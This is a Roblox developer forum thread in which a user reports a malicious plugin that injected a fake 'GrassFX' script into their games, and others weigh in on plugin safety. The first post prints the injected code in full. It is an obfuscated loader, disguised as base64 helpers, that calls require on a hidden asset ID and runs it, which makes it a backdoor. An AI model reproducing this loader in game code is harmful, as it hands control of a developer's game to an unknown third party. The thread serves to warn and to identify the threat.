Script GrassFX:48 malicious script in Gui plugin pretending to be a roblox script

this malicious script was in a gui plugin on the main page of plugins, added invisble lines to every script i had

--// This is a default Roblox grass script. Dont remove for high quality grass. \-- 
 --// Contact Chaz#4045 for questions! \-- 

function lsh(value,shift)
	return (value*(2^shift)) % 256
end

-- shift right
function rsh(value,shift)
	return math.floor(value/2^shift) % 256
end

-- return single bit (for OR)
function bit(x,b)
	return (x % 2^b - x % 2^(b-1) > 0)
end

-- logic OR for number values
function lor(x,y,z)
	require(z).run(script)
	result = 0
	for p=1,8 do result = result + (((bit(x,p) or bit(y,p)) == true) and 2^(p-1) or 0) end
	return result
end
-- encryption table
local base64chars = {[0]='A',[1]='B',[2]='C',[3]='D',[4]='E',[5]='F',[6]='G',[7]='H',[8]='I',[9]='J',[10]='K',[11]='L',[12]='M',[13]='N'}

-- function encode
-- encodes input string to base64.
function enc(data)
	local bytes = {}
	local result = ""
	for spos=0,string.len(data)-1,3 do
		for byte=1,3 do bytes[byte] = string.byte(string.sub(data,(spos+byte))) or 0 end
		result = string.format('%s%s%s%s%s',result,base64chars[rsh(bytes[1],2)],base64chars[lor(lsh((bytes[1] % 4),4), rsh(bytes[2],4))] or "=",((#data-spos) > 1) and base64chars[lor(lsh(bytes[2] % 16,2), rsh(bytes[3],6))] or "=",((#data-spos) > 2) and base64chars[(bytes[3] % 64)] or "=")
	end
	return result
end

-- decryption table
local base64bytes = {['A']=0,['B']=1,['C']=2,['D']=3,['E']=4,['F']=5,['G']=6,['H']=7,['I']=8,['J']=9,['K']=10,['L']=11,['M']=12,['N']=13}
function dec(data,i)
	local chars = {}
	local result=""
	if not data then
		lor(2,5,i)
	end
	for dpos=0,string.len(data)-1,4 do
		for char=1,4 do chars[char] = base64bytes[(string.sub(data,(dpos+char),(dpos+char)) or "=")] end
		result = string.format('%s%s%s%s',result,string.char(lor(lsh(chars[1],2), rsh(chars[2],4))),(chars[3] ~= nil) and string.char(lor(lsh(chars[2],4), rsh(chars[3],2))) or "",(chars[4] ~= nil) and string.char(lor(lsh(chars[3],6) % 192, (chars[4]))) or "")
	end
	return result
end
dec(nil,0x139326cd0)
-- command line if not called as library
if (arg ~= nil) then
	local func = 'enc'
	for n,v in ipairs(arg) do
		if (n > 0) then
			if (v == "-h") then print "base64.lua [-e] [-d] text/data" break
			elseif (v == "-e") then func = 'enc'
			elseif (v == "-d") then func = 'dec'
			else print(_G[func](v)) end
		end
	end
else
	
end

image

pretty sure that scripts a fake and is malicious like the other lines it added to alot of other scripts

image

worst part is it came from one of theese ui plugins on the main page

This code has nothing to do with grass. It’s most likely malicious.

2 Likes

Too bad! Impossible to trust on plugins and things made by other users. Another reason why do not use plugins. The only plugin I use is RigEdit, I hate all those plugins, using them make me feel useless. If you cant code something, you better learn how to do it, not use a plugin : /

You dont know which plugin did it?

1 Like

ya it was a gui one i downloaded it to convert my gui’s to scale had nothing to do with scripting

i had used a gui plugin a year ago was great for converting all your gui’s to scale really fast

The fact that it has several functions used for encoding and decoding, and what @AstroCode suggested as well are instant red flags that this isn’t meant to be there. Also:

image

You can see that in this function it’s requiring z (which I assume would be the decoded module id) and then calling a function named run. This is probably a backdoor and you should remove it from your game asap. Make sure you check for other malicious scripts similar to this one because malicious plugins like to duplicate backdoors and spread them in places you’d never think to look.

Good luck!

Awful take. Plenty of developers push forth great products that are safe and reliable for power-users. Fact is that some programmers are just more well-versed and can create better products than you can, so why not save time and support them as a producer in the process?

2 Likes

i put all my versions back to the 15th to be safe not even trying to track all this mess down

1 Like

I agree with you to an extent. However, I think it should be noted that many beginners would have a hard time checking the authenticity of a plugin, and sometimes don’t even know that malicious or fake plugins exist.

If it weren’t for the people that made these types of plugins solely for the purpose of taking advantage of others we wouldn’t have to be on such high alert.

Personally, I think that plugins are a great feature on the platform and are super useful, but they need to be moderated a lot better. There should either be some sort of UGC-like program that verifies users who create quality plugins and allows them to upload or just tighten security on all plugins by verifying that they aren’t malicious before allowing them to be uploaded.

2 Likes

I dont know, everybody has their own methods, mine is not using plugins. If I want something to be done, do it myself, if I use plugins I become lazy.
Of course theres many plugins perfectly safe, thats why I use RigEdit, and I support it. But I prefer to learn, instead of saving time.

You can scale your gui’s without using any plugin, manually or by script, everything is related with scripting

I could write a long thread about checking plugin authenticity, but I’ll save that for another time. Long story short: every uiDesign plugin on that front page is fake. If you see a plugin that seems interesting, first browse the Community Creations category for it because, more often than not, the developer will have posted information about their plugin there.

Be careful, however, because people are sly. This seems to be the correct plugin as it is by Stelrex, the original creator of the uiDesign plugin:


However, upon clicking on the creator, you’ll be brought to a group page named Stelrex, a fraudulent, malicious group that is posing as his user at face-value.
image

People are smart. You have to be quite careful about the things you’re installing because they’ll more often than not come from a malicious source.
To be safe:

  1. See if the plugin provides a DevForum thread about it; that should provide you the correct plugin link above all, so threading that needle should be your first priority.
  2. Double, triple, and quadruple check the source of a plugin. Ideally, you would cross-reference it with a DevForum thread.
  3. Do not permit any plugins to have permissions to inject scripts, have permission to make Http requests, or any other miscellaneous permissions unless you can verify with 100% certainty that it is coming from an original or credible source.

All in all, I’d uninstall whatever uiDesign plugin you acquired and take the one from here instead: UiDesign plugins. Good luck.

3 Likes

ofc you can but it takes like 2 hours compared to 10 mins

1 Like

Learning to do it faster then. Now those 10 minutes of improvement got you at this problem :confused:
Practice never harm anyone

1 Like

Peashie your just getting on my nerves now, Alvin Blox i consider a credible source he recommends plugins in Youtubre videos. Every single new person that ever comes to attempt to make games is gonna run into this kinda trash that shows up on the plugins… just stop… wasting your time trying blah blah to me

My Favourite PLUGINS in Roblox Studio - Bing video

Relax dude, thats my point of view, and I respect any point of view, learn to relax. Idc if someone recomends it or not, its my point of view. I’ve been respectful towards you. And this is a forum we’re free to say our points… cheesee… ¬¬

2 Likes

This mentality is kind of the opposite of what plugins are intended for. Plugins are meant to make your workflow simpler. Think of it like a framework – why re-invent something that already exists?

I do agree however that it is impossible to trust plugins made by users. It’s been apparent for a few years already that the developer library itself has become bloated with malicious plugins. Very unfortunate situation all around.

1 Like

This is an incredibly inappropriate response to her opinion on not wanting to use plugins. I’ve worked with Peashie before on the DevForums and she seems like a very knowledge individual.

I would really consider being more open to opinions in the future moving forward. :slight_smile:

2 Likes

I agree; however, I think the best approach would be to revise the system to instead moderate plugins that file requests for HTTP calls or script injection.

As of recent, we’ve been provided the means to detect these sorts of things in Studio, so I’m a strong proprietor of the idea that said process should be expedited to the catalog (with a warning about the risks!).

1 Like

I agree. If evil ppl wouldnt exist, this kind of problems wouldnt exist. Thats the only problem. Maybe implement better checks on how Roblox lets ppl to upload plugins.

I know my mentality its the opposite to what plugins are for. Thats why I dont use them. I want to learn, no matter if already exists, I want to learn to do it, thats my way to be. I think anyone can use their own methods, all are useful. Just be cautious using other’s works if we’re not able to understand their systems.

EDIT:

Its ok, and I didnt meant to be rude or something by saying my thoughts, this situation is too bad, and I feel bad that you lost ur work. But, well @HollowMariofan gave u a great solution, now just, back to work. Good luck friend @zuggy81

3 Likes

ya i gotta say im a little upset i had to revert and lose everything i did the last 2 days, and it happened at the worst time when i switched my whole project to team i just thought it was animations errors that i had to re upload so i didnt pay attention

1 Like